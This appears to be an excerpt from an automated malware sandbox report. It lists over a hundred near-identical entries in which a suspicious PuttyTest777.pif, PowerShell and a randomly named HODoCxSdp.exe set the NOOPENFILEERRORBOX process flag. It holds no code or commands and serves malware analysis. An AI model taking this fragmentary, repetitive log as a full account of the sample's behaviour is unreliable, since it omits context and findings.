Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process information set: NOOPENFILEERRORBOX
